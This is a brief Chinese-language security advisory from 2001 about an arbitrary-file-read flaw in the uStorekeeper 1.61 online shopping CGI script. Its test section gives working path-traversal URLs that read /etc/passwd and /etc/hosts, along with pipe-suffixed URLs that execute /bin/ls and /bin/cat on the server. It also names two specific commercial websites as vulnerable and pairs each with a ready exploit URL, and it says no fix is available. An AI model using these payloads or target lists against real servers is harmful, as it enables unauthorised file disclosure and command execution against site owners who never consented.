uStorekeeper(tm) Online Shopping System存在任意文件可获得漏洞发布时间:2001-04-04 更新时间:2001-04-04 严重程度:高 威胁程度:远程非授权文件存取 错误类型:输入验证错误 利用方式:服务器模式 受影响系统 ustorekeeper.pl version 1.61详细描述 ustorekeeper.pl version 1.61在用户输入方面没有进行很好的过滤, 可能导致输入任意值来获得远程服务器上的文件。 测试代码 http://www.vulnurable.com/cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../etc/hosts http://www.vulnurable.com/cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../bin/ls | 有漏洞的站点: http://www.lynchs.com/cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd http://www.madamealexanderdollmuseum.com/cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../../../../../../bin/cat%20ustorekeeper.pl| 解决方案 尚无 相关信息 此信息有UkR security team发现。 |
